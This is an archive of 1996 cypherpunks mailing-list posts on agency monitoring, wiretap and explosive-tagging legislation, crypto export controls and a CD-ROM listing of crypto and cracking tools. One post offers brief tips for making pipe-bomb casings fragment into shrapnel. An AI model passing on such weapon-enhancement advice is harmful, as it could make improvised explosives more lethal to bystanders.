> Cute story. But it's not "confirmed".
> 
> Well, it might be if you want to hold yourself to the journalistic 
> standards of the Mall crowd.
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 29 Jul 1996 08:49:59 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Twenty Beautiful Women
In-Reply-To: <v03007802ae200d413cd9@[192.187.162.15]>
Message-ID: <Pine.SV4.3.91.960728184434.5123A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> What is the optimal strategy for insuring you get the most beautiful woman
> possible under the circumstances?


    Bribe the Mama-San.   One gal might work the streets or the bar by 
herself, but 20 women is someone's inventory.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Mon, 29 Jul 1996 12:15:20 +0800
To: jimbell@pacifier.com
Subject: Re: your favorite poison recipes
Message-ID: <199607290212.TAA10468@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cjs@netcom.com, jimbell@pacifier.com, cypherpunks@toad.com
Date: Sun Jul 28 21:12:49 1996
You forgot 2oz of Grand Marnier(sp).  Also the Creme should be Irish.

Lou Z.

>  While 
> 
> I recommend:
> 
>       2oz Kahula
>       2oz Vodka
>       2oz Creme
> 
>       Mix this with some ice in a glass, garnish with a cherry.
>       
>       If you use Midori instead of Kahula, it turns a really cool
>       shade of green.
> 
>       Drink. 
>       
> If ya don't like my poison, pick ya own. =)
> 
> Christopher
> 
> 

Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMfweNstPRTNbb5z9AQEikwf/ZuyH2o7oip3C8Tt14mi5Vkc2yLhndlM8
q6m6/+AmsyaS0wrba+Dc52mPsmDLRraalYBY+IX5rFW/WRbSYoFqSrydxNr6XH7x
PFRmKr2eYHy4lia2jc2CyUahfu4HXn4kr9rJdEBb2mr/LOkrZJKnrFBgORvvbxMv
bHBGWILa2EgAb7fBEXNgeoJlZbyOfj296SAw/bI5dkb3R+A53DouvUi6cTF7ZgKx
nfZVRbb34qwH3oi6ey6S3buZBnEHjsl6sIBCEKxkM/blVafX2XiLwN6k7nmH7ZRh
AXvvoNMi8JlGJMQGqZUzyZqMm9IRd27oPT19qVITOzcuUwYryZY1+w==
=VFom
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 29 Jul 1996 09:34:02 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: TLAs on cypherpnks (was Re: ALL OF YOU ARE CRIMINAL HACKERS)
In-Reply-To: <Qlyw0Pi00YUw082qk0@andrew.cmu.edu>
Message-ID: <Pine.SV4.3.91.960728193638.5123H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Cute story. But it's not "confirmed".

Well, it might be if you want to hold yourself to the journalistic 
standards of the Mall crowd.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Mon, 29 Jul 1996 13:00:51 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: TLAs on cypherpnks (was Re: ALL OF YOU ARE CRIMINAL HACKERS)
Message-ID: <2.2.16.19960729025129.372f692c@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


        
>[Declan asked a former CIA employee] if he had ever monitored the
>cypherpunks list. "No, I
>didn't. It was too high-traffic," he said. "But the guy in the next
>office over from me did."
>
>Is this the first confirmed report of TLA cypherpunk-monitoring?

Given that no names or dates are mentioned, I dunno if it's fair to call it
"confirmed". It doesn't seem to be re-confirmable, if someone else wanted to
verify it independently. I'm also not sure that a TLA employee reading the
list because they happen to find it interesting counts as "monitoring".
"Monitoring" suggests to me that it's being read/filtered/indexed/archived
in some organized and deliberate fashion.

Even so, the issue seems likely to generate more heat than light. If the
list is interesting, it's unremarkable that one or more TLA employees would
choose to read it. On our better days, we're talking about the
intersection(s) between politics and privacy and technology - issues which
affect the performance of many of a TLA's duties as well as the public will
to maintain the policies and funding of the TLA and its employees. It's not
surprising that TLA's want the capability to read every word written and
hear every word spoken; it's just surprising that they believe that using
law to maintain their ability to do that is compatible with the Constitution. 
--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 29 Jul 1996 10:19:21 +0800
To: cypherpunks@toad.com
Subject: Re: your favorite poison recipes
In-Reply-To: <199607281911.MAA02693@jobe.shell.portal.com>
Message-ID: <3uwsRD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com writes:

> Please post your favorite poison recipes to this mlist.

Our least favorite vegetable in a wheelchair can tell you that swallowing cum
can be _very bad for your health if the guy squirting in your mouth is HIV+.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Mon, 29 Jul 1996 13:35:35 +0800
To: cypherpunks@toad.com
Subject: Re: your favorite poison recipes
Message-ID: <v03007603ae21eb48bdf8@[204.179.128.22]>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous writes:

>Please post your favorite poison recipes to this mlist.
I'd have to say Federal Match in.308, Lead poisoning -- Long distance.


martian Minow writes:
>
>Rare roast beef, baked potato with plenty of butter, red wine.
>
Martin; last time I checked you were a trickle down vegaterian too.


Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 28 Jul 1996 21:10:49 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Twenty Beautiful Women
In-Reply-To: <v02120d17ae20b5c23ccc@[192.0.2.1]>
Message-ID: <199607281026.UAA07031@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 
> At 20:54 7/27/96, Mike Duvos wrote:
> >ichudov@algebra.com (Igor Chudov @ home) writes:
> >
> > > Also, I would appreciate if someone specified what exactly
> > > the goal function is.
> >
> >Me too.
> 
> For clarification, the problem is often stated in textbooks similar like this:
> 
> You ask someone to write one number each on ten pieces of paper without you
> being able to see the numbers. The person may use any number from 1 to
> 10^99, but may not use a number twice. The person turns over the ten
> papers.
> 
> You goal is to determine the paper with the highest number [rules apply as
> described in the original post]
> 
> The general solution is to flip over 1/e papers and choose the paper that
> has a higher number on it than any of the 1/e papers turned over at first.

Can someone explain the theory behind this?


-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Mon, 29 Jul 1996 10:56:50 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Feinstein wants controls on Internet, Books
In-Reply-To: <199607282047.NAA28494@toad.com>
Message-ID: <199607290044.UAA00896@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:

: Now, there are subtleties to building them that may require 
: some amount of thought, rather than being totally obvious to the builder,
: and there are things that are obvious but are difficult to do.
: 
: For instance, say you, hypothetically, wanted to blow up your government's
: legislative building.  You'd obviously want to pick a dark and stormy night,
: say early in November, and you'd sneak into the basement with barrels
: of gunpowder.  You'd use a long, slow-burning fuse, so it would blow up
: the next day when they're in session, but after lighting it you'd still
: run away very fast just in case your fuse speeds up on you.  The obvious
: thing you'd need to do is to NOT GET CAUGHT LIKE THE LAST FOOL WHO TRIED IT.
: However, if you do get caught, maybe you'll end up with your name in lights
: and people will set off firecrackers in your honor every fall,
: while if you don't get caught you won't be personally famous. Tough choice:-)
: 
: Penny for the Guy?

Did the old Guy and his co-conspirators use crypto?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Mon, 29 Jul 1996 13:58:03 +0800
To: cypherpunks@toad.com
Subject: Re: Feinstein wants controls on Internet, Books
Message-ID: <v03007804ae21e46c35ca@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


>From <http://cnn.com/US/9607/28/clinton.speech/index.html>:

>                            The president said he has invited congressional leaders to meet with the
>                            head of the FBI on Monday. 
>
>                            The leaders will discuss bills that would expand wiretaps and allow for
>                            chemically "tagging" explosives, which could help track terrorist acts.
>                            Such legislation is needed to "increase the protection of the American
>                            people," Clinton said. 
>
>                            Both measures were taken out of an anti-terrorism bill Clinton signed
>                            into law earlier this year. He also said that a spate of recent acts of
>                            political violence showed that law enforcement needed such powers. 
>
>                            "As strong as the bill was, it did not give our law enforcement officials
>                            some of the powerful tools I had recommended," Clinton said. 

and from a similar article on AOL (from Reuters):

>    ``We will ... do whatever is necessary to give law enforcement the tools they need to find 
>terrorists before they strike and to bring them swiftly to justice when they do,'' he said. 
>
[snip; same as the cnn story]
>
>    The expanded wiretap authority would allow law enforcement personnel to listen to all 
>communications devices used by a given person, including a home phone, mobile phone and 
>pager. At present, authority is given over a specific phone number, rather than for a 
>specific person. 
>
>    The second measure would require explosives makers to insert a chemical fingerprint 
>in their products that would help authorities narrow their search for a bomber. 

The White House web page does not have a transcript of the President's speech; in fact, under "Today's Top Issue" was 'President Clinton's Call for a National Community Policing Number', dated July 23rd.



-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We're not gonna take it/Never did and never will
We're not gonna take it/Gonna break it, gonna shake it,
let's forget it better still" -- The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Mon, 29 Jul 1996 11:32:49 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: ALL OF YOU ARE CRIMIN
In-Reply-To: <Pine.BSF.3.91.960728163004.8008D-100000@mcfeely.bsfs.org>
Message-ID: <Pine.LNX.3.95.960728210507.21489A-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


     For somone who is so afraid what people are doing with knowledge
found on the internet you seem to be doing a good job of using it
yourself. You are a hypocrit of the woorst kind. It is disgusting that you
would complain about other people and then use a remailer. And in case you
are unaware of netiquette one doesn't use all capital letters . That is
screaming . If we don't know who you are I doubt that we have done
anything to be screamed at by you. 
      If this list really bothers you then I think it would be better for
all if you left  it.If you reaaly want to contact a fed agency about
problems why don't you contact them about alt.bestality(I like animals). 
      In any case I think that we are monitored by the government anyway.
They have to do something to justify not being cut back
                           moroni
                             with real handle and real electronic address
above


On Sun, 28 Jul 1996, Rabid Wombat wrote:

> 
> 
> On Sat, 27 Jul 1996 pjn@nworks.com wrote:
> 
> >  > At 09:33 PM 7/26/96 -0700, anonymous-remailer@shell.portal.com wrote:
> >  >I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL HACKERS
> >  >AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI IMMEDIATELY SO THAT THEY
> >  >CAN TRACK YOU DOWN AND CLOSE THIS LIST.
> >  >
> > 
> 
> Yes, your remailer appears to be working. You're welcome.
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 29 Jul 1996 08:20:31 +0800
To: cypherpunks@toad.com
Subject: Crypto and Sec Files
Message-ID: <199607282138.VAA00962@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Complete Internet Business Toolkit 
   By Winn Schwartau and Chris Goggans 
   Van Nostran Reinhold, New York, 1996 
   262 pp. Paper, with CD-ROM. $34.95 
   ISBN 0-442-02222-0 
 
 
   [Excerpt] The contents of this CD-ROM are copyrighted and 
   protected by United States copyright laws. The individual 
   programs included on the CD-ROM are copyrighted by the 
   authors or owners of those programs. To use any program, 
   you must follow the requirements as stated within any 
   licensing agreement included with that program. ... 
 
 
   You should also remember that some ofthe applications and 
   information included on this CD-ROM is forbidden to export 
   from the United States. Cryptographic algorithms and 
   programs using such algorithms are classified as munitions 
   by the United States government, and the penalties for 
   taking them out of the country are very harsh. For this 
   reason, DO NOT TAKE THE CD-ROM OUT OF THE UNITED STATES, OR 
   YOU MAY WIND UP IN JAIL. 
 
 
   [The Crypto and Secure directories of 22 directories]: 
 
 
   \TOOLKIT\CRYPTO\ 
 
   ABSOLUTE EXE       310,509 02-20-96   5:39p 
   ANONMAIL ARJ        17,123 03-10-96   6:45p 
   BLIND-SE DOC         9,276 03-10-96   6:45p 
   BLOWFISH ZIP        18,981 03-19-93   3:53a 
   BLOWFS58 ZIP        62,698 03-10-96   7:08p 
   CHAIN    ZIP        22,300 03-10-96   6:45p 
   CPHANT   ZIP        40,448 03-10-96   6:46p 
   CRIPWIN2 ZIP        81,121 02-16-96   1:21p 
   CRYPT20  ZIP        62,143 03-10-96   7:08p 
   CRYPT201 ZIP     1,137,996 03-19-93   3:43a 
   CRYPTE1  ZIP        28,521 03-10-96   7:09p 
   CRYPTIC  ZIP       486,830 02-13-96   7:17p 
   CRYV120S ZIP       343,690 02-16-96   1:21p 
   DES      EXE        71,484 02-20-96   4:12p 
   DES3     ZIP       195,642 02-14-96   5:52p 
   DIGSIG   ZIP        63,394 02-16-96  12:02p 
   DOSBAT   ZIP         5,455 03-10-96   6:45p 
   EFW32U   ZIP       525,722 02-16-96   1:27p 
   ELIPT210 ZIP        61,786 03-10-96   7:00p 
   ENCRYP   ZIP       218,717 02-16-96   1:27p 
   ENCRYPT  ZIP        17,873 03-10-96   7:09p 
   ENIGMA21 EXE       196,189 02-20-96   6:02p 
   ENIGMA30 ZIP       449,132 02-20-96   6:03p 
   ENIGWIN1 EXE     1,019,818 02-20-96   6:06p 
   EXCRAK   ZIP       278,946 02-12-96   7:05p 
   HDSK41B  ZIP       263,869 03-10-96   6:42p 
   IDEA22A  ZIP         14,592 03-10-96  7:00p 
   IDEA3    ZIP         6,885 03-10-96   7:09p 
   KRYPTO11 ZIP        15,972 03-10-96   7:09p 
   MD5ASM32 ZIP         7,988 03-10-96   7:00p 
   MESS11B  ZIP        26,490 03-10-96   6:40p 
   MRRCIP   ZIP       148,569 02-20-96   6:18p 
   NAUT090  ZIP        53,356 03-10-96   6:47p 
   NAUT09OS ZIP       106,864 03-10-96   6:48p 
   NCRYPT31 ZIP        21,481 03-10-96   7:09p 
   NEWDES12 ZIP        30,295 03-10-96   7:09p 
   OTP-10   ZIP        83,559 03-10-96   7:01p 
   PASSGN50 ZIP       147,742 02-12-96   7:41p 
   PGP262   ZIP       282,786 03-20-96  12:40a 
   PGP262DC ZIP       167,102 03-20-96  12:41a 
   PGP262S  ZIP       658,945 03-20-96  12:44a 
   PGPCLIP  ZIP        52,020 02-13-96   7:14p 
   PGPFRONT ZIP        62,885 03-10-96   7:10p 
   PGPSHE33 ZIP       114,840 03-10-96   7:11p 
   PKCRACK  ZIP        25,374 03-10-96   6:56p 
   PUBKEYS  ZIP         7,118 03-10-96   6:45p 
   QPCRAK   ZIP       255,731 02-16-96   1:52p 
   R4DCRYPT ZIP        15,895 03-19-93   3:54a 
   RC4      ZIP           815 03-19-93   3:46a 
   SCRYPT3  ZIP        27,169 03-10-96   7:11p 
   SCYTAL13 ZIP       489,687 02-16-96   1:57p 
   SECDR13A ZIP        87,769 03-10-96   6:49p 
   SECDR13C ZIP       108,617 03-10-96   6:50p 
   SFS10TEX ZIP       293,319 03-10-96   7:12p 
   SFS110   ZIP       245,159 03-10-96   7:12p 
   SPLOK18  ZIP        10,394 02-16-96   1:58p 
   SPLOK95  ZIP        22,799 02-13-96   5:27p 
   SPLOKNT  ZIP        22,538 02-13-96   7:14p 
   STEGODOS ZIP        21,958 03-10-96   6:42p 
   TANGLE   ZIP        34,472 03-10-96   7:13p 
   TOMB100  ZIP        22,800 03-10-96   7:13p 
   UECRYP01 ZIP        15,774 03-10-96   7:13p 
   UNSSL    C          11,646 03-10-96   6:56p 
   VOUCH10  ZIP        89,257 03-10-96   7:13p 
   WDCRAK   ZIP       270,716 02-16-96  12:37p 
   WINCRACK ZIP       141,025 03-10-96   6:57p 
   WINPGP10 ZIP        23,739 02-16-96   2:10p 
   WINPGP26 ZIP       245,421 09-21-92  11:24p 
   WNS210   ZIP        84,102 03-10-96   6:42p 
   WPCRACK1 ZIP       146,717 02-16-96   2:13p 
   WPCRACKB ZIP         9,140 03-10-96   6:58p 
   WPCRAK   ZIP       181,848 02-16-96  12:31p 
   ZIPCRACK ZIP        83,005 01-29-96  12:05p 
 
 
   \TOOLKIT\SECURE\ 
 
 
   BLANK20  ZIP        10,499 02-12-96   4:26p 
   CALLER1A ZIP     1,180,957 02-12-96   2:06p 
   CALLERID ZIP     1,278,664 02-16-96   1:19p 
   CID125   ZIP       478,908 02-16-96   1:20p 
   DMNPASS2 ZIP        41,742 02-16-96   1:21p 
   KEYAPP   EXE       135,168 02-19-96  10:58a 
   LOCK     ZIP        10,448 02-16-96   1:37p 
   LOCKSET  ZIP        12,138 02-12-96   4:27p 
   LOCKTT23 ZIP       233,259 02-16-96   1:38p 
   NOBLANK  ZIP        23,673 02-12-96   4:39p 
   PRGRD-22 ZIP       165,933 02-12-96   4:43p 
   RESTEASY ZIP        63,911 02-16-96   1:54p 
   S-TOOLS  ZIP       134,707 02-16-96  12:14p 
   SAFEPR   ZIP       331,502 02-16-96   1:56p 
   SECGP114 ZIP        31,548 02-16-96   1:57p 
   SECLAU   ZIP        42,057 02-16-96   1:58p 
   SECURE   ZIP        69,463 02-12-96   2:00p 
   SECURE10 ZIP        49,753 02-16-96   1:58p 
   SECWIZ   ZIP       184,984 02-12-96   2:00p 
   WINPAS11 ZIP        12,493 02-12-96   7:01p 
   WINSEC10 ZIP       317,974 02-12-96   7:02p 
   WINU202  ZIP       171,252 02-13-96   5:30p 
   WLOCK16U ZIP        19,324 02-12-96   7:02p 
 
 
   \TOOLKIT\SECURE\TEXT\ 
 
 
   BIBLIO   ZIP        18,912 01-29-96  12:08p 
   CRC      ZIP        29,038 01-29-96  12:08p 
   FCVOL1   ZIP       155,958 01-29-96  12:09p 
   FCVOL2   ZIP       166,764 01-29-96  12:11p 
   GRNBOOK  ZIP       275,675 01-29-96  12:12p 
   IPEXT_PS ZIP        43,578 01-29-96  12:12p 
   ITAR9307 ZIP       205,226 01-29-96  12:12p 
   NCSCTG25 ZIP        20,682 01-29-96  12:12p 
   ORNGBOOK ZIP        94,112 01-29-96  12:12p 
   REDBOOK  ZIP        19,891 01-29-96  12:13p 
   SECURITY ZIP        51,123 01-29-96  12:13p 
   SEC BIBL ZIP        16,861 01-29-96  12:13p 
   SNR9501  ZIP        24,719 01-29-96  12:19p 
   SNR9503  ZIP        22,168 01-29-96  12:19p 
   SNR9504  ZIP        34,758 01-29-96  12:19p  
   TEMPEST  ZIP         6,868 01-29-96  12:13p 
   TOUR PS  ZIP        69,116 01-29-96  12:21p 
   UEBER    ZIP         4,100 01-29-96  12:13p 
   UNIX SEC ZIP         8,179 01-29-96  12:21p 
   WORM REP ZIP       111,782 01-29-96  12:21p 
 
   ---------- 
 
 
   In accord with Schwartau's and Goggans's copyright and 
   export notifications, these files might be made available 
   to those who may not have access to the volume's CD-ROM. 
   Request a selection(s) by PGP msg and your thumbprint. 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Mon, 29 Jul 1996 15:20:03 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Internet blamed for pipe bombs
Message-ID: <01BB7CD4.96FA07E0@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


I've heard that in a lot of cases, too, automobiles have been the vehicle 
used by the prep. to transport bomb-making materials and bombs to/from 
their target sites.  I'm starting to get concerned that this type of 
personal transportation technology makes it just too damn easy to wreak 
havoc and destruction on unsuspecting innocents.

I think they ought to pass some kind of legislation restricting the use of 
vehicles that do not have approved travel-itineraries on file with the 
Travel Escrow Bureau.
	
>>>   Across the country, latest figures from the U.S. Bureau of Alcohol,
>>>   Tobacco and Firearms show a 20 percent jump in pipe bomb incidents
>>>   between 1990 and 1994.
>>
>>[...]
>>
>>>   "We've been incredibly busy," said sheriff's bomb technician Judd
>>>   Holiday. "As crime in other categories is dropping, this is going 
up."
>
>The friendly Anarchist's Bookstore in San Francisco sells several books on
>building bombs. No Internet connection required. I would like offer ano  
ther
>possible explanation for the increase in pipe bombings. The People are
>getting frustrated and a pipe bomb can be very useful device releasing
>one's frustration.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Mon, 29 Jul 1996 15:06:33 +0800
To: "'cypherpunks@toad.com>
Subject: FW: LOOKING FOR THAT SPECIAL SOMEONE?
Message-ID: <01BB7CD4.99E42F80@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone else on the list goet this?

----------
From: 	mary[SMTP:mary@globalpac.com]
Sent: 	Sunday, July 28, 1996 3:56 PM
To: 	ml@aol.com
Subject: 	LOOKING FOR THAT SPECIAL SOMEONE?

Feeling sentimental?  Would you like to get in touch with an old friend,
loved one, family member or colleague?  Do you need help in locating a
(former) spouse for alimony or support payments?  Does someone owe you money
that you haven't been able to collect because you can't find them or their
assets?  Let me help. I've been doing this for twenty some years and am very
good at it.  My fees are reasonable and if I can't find what you need, there
will be no charge. If interested, please reply to above.  Thank you for your
time.
Mary Anderson
P O Box 39362,
Los Angeles, Ca  90039    












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 29 Jul 1996 13:58:15 +0800
To: sandfort@crl.com (Sandy Sandfort)
Subject: Terrorists are adult Kids?
In-Reply-To: <Pine.SUN.3.91.960728175909.9109A-100000@crl13.crl.com>
Message-ID: <199607290336.WAA27752@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

To: sandfort@crl.com (Sandy Sandfort)
Cc: cypherpunks@toad.com, scrm
Subject: Terrorists are adult Kids?

Sandy Sandfort wrote:
> The Sunday San Francisco Examiner had an article about how simple
> it is to make a pipe bomb.  It was syndicated from the Dallas
> Morning News.  In the article a "federal bomb expert" opined:
> 
> 	They're probably one of the more common explosive
> 	devices that are encountered.  That's because the
> 	pipe not only provides a container, but fragments
> 	into sharapnel."                        ^^^^^^^^^
> 	^^^^^^^^^^^^^^
> Now I don't know what takes to qualify one as a "bomb expert,"
> but the standards must be pretty low.  The reason hand grenades
> look like pineapples is because it's very difficult to get metal
> to fragment unless it is scored or otherwise predisposed to come
> apart in little pieces.  What I've been told is that a pipe bomb
> just peals open at it's weakest place and otherwise stays in one
> piece.  Don't know, but that's what I've heard.  Makes sense to
> me.

It depends on the quality of metal the pipe is made from. If it
has a lot of carbon the pipe indeed can split into small pieces. 
Also, as far as I remember, if you heat the pipe red and then throw it
into water and repeat this process several times, the metal may 
become very fragile.

Plz correct me if I am wrong.

Also, nothing prevents you from making grenade-like marks on
the pipes. It is very easy if you have the right instruments.
While in high school in Russia, I was taught how to work with
metal and indeed making these kind of marks is one of the most 
trivial exercises.

BTW, almost all male kids in russia experiment with bomb-making,
rocket-making, explosives and so on. Once I was going to school
#57 in a tram and a small bomb exploded right in my school bag.
It was made from Ammonium triiodide which is really unstable.

Everyone in the tram was really surprised and I was really pissed off.

In the hindsight it was fairly dangerous and some of my friends were
hurt by bombs. HOWEVER, I have a theory that males never really grow 
up and continue playing toys 'til they die. I think that guns are also
male toys, by the way. 

So the idea is, maybe if kids play enough with explosives WHILE THEY ARE
KIDS, they would get enough of it and would not continue playing with them
when they grow up (and become more dangerous). Like, I myself pretty much
lost interest in building explosive devices and rocketry after 18.

Since this country is too safe, kids do not get their share of danger
and try to recoup it in adulthood. Which results in stupid terrorism.

	- Igor.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfwxvsJFmFyXKPzRAQGSogQAluZwxBXFVU/AI9aZZyNOefpYc3Sumjka
egpoZCnAWXPmmvGU0e+N8adYynQxgGWb2o6WTPFS3kNG8G3aEujMojlbJod1fGx9
VbD8TZjpi67jgmDJuDbXIWjgcVAzwjWmijn9L0x9h4nNTbyChvRxnwo2Q6vYoqir
loniT0I/1dg=
=DmH5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Mon, 29 Jul 1996 15:53:22 +0800
To: cypherpunks@toad.com
Subject: RPK Cryptography
Message-ID: <199607290543.WAA28726@vishnu.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone on the list heard of this?  Any opinions regarding its security?

Dana W. Albrecht
dwa@corsair.com


---------------------------------------------------------------------------

> May 21, 1996 -- AUCKLAND, New Zealand -- A fledgling startup, RPK New
> Zealand, today announced that a new public key encryption system,
> known also as RPK, is available free, for review and evaluation on the
> World Wide Web.  RPK is inviting worldwide evaluation and scrutiny of
> their new system with the goal of creating, for the first time ever, a
> worldwide industrial-strength security and encryption standard.  The
> company is also offering a free version of an end user program
> designed to be used for secure transfer of information to encourage
> use and trial of the technology.
> 
> RPK New Zealand is one of the new, very small, "worldwide entities"
> that has benefited from the global market access provided by the
> public Internet.  Previously kept confidential while patent
> applications were being filed in  New Zealand and for the rest of the
> world under international treaty, the RPK cryptographic system was
> unveiled  this week via the World Wide Web (http://crypto.swdev.co.nz)
> where the technology's inventor, Bill Raike, has also offered a
> US$3,000 "RPK SafeCracker Challenge."
> 
> Raike, a mathematician and computer scientist who has dual U.S. and
> New Zealand citizenship, combined some simple algorithms with well-
> accepted higher mathematics to invent the world's fastest-ever system
> for secure communications  and he's betting US$3,000 that no one in
> the world can break into RPK's Virtual Vault and thereby prove him and
> his fledgling startup wrong.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 29 Jul 1996 09:05:54 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: WaPo on Crypto-Genie Terrorism
In-Reply-To: <v03007805ae21721e971a@[192.187.162.15]>
Message-ID: <Pine.LNX.3.94.960728224653.505A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 28 Jul 1996, David Sternlight wrote:

> Date: Sun, 28 Jul 1996 12:59:37 -0700
> From: David Sternlight <david@sternlight.com>
> To: Deranged Mutant <WlkngOwl@unix.asb.com>, John Young <jya@pipeline.com>,
>     cypherpunks@toad.com
> Subject: Re: WaPo on Crypto-Genie Terrorism
> 
> At 5:55 PM -0700 7/27/96, Deranged Mutant wrote:
> >On 27 Jul 96 at 19:21, John Young wrote:

[stuff skipped]

> 
> This, and similar remarks by others, consistently misses the point which I
> have been making for about a year now, and which Director Freeh finally
> made explicit in his testimony last week. That is--the government is
> concerned with mass market software incorporating robust crypto, used
> overseas, and recognizes that they can't keep niche products off the
> market, nor stop bad guys from using crypto the government would just as
> soon they didn't. Since the US has a hammerlock on that mass market, and
> since few would switch products to let the crypto tail wag the features dog
> (no slur intended), ITAR follows.
> 

Hrmmm... "is concerned" I can understand, but banning it, or what we do
with it, is definatly against the First Amendment.

> 
> Though I've no connection with Freeh, it's interesting that his language is
> almost word for word the same as what I've been using. Do you suppose some
> of his staff reads my stuff?
> 
> Until now we haven't seen such an open public admission of what the
> government is concerned about--probably because the State Department
> doesn't like to have an official spokesman admit we're mass monitoring and
> seining foreign traffic since it is an embarassment to the polite fiction
> of diplomatic relations (though I'm sure the truth is that every country
> with the capability does it).
> 

yes, I'd say that every country that can does... but what does that have
to do with anything?

> 
> >
> >[..]
> >>    with wiretapping. Mr. Freeh, testifying at Thursday's hearing in
> >>    favor of an optional key escrow plan, noted that the point is not
> >>    to prevent all  copies of uncrackable code from going abroad --  that's
> >>    clearly impossible -- but to prevent such high-level code
> >>    from becoming the international standard, with architecture
> >>    and transmission channels all unreadable to world
> >>    authorities. To software companies and Internet users who
> >
> >So why should criminals bother with using standards if they are
> >readable by authorities?
> 
> See above.
> 
> >
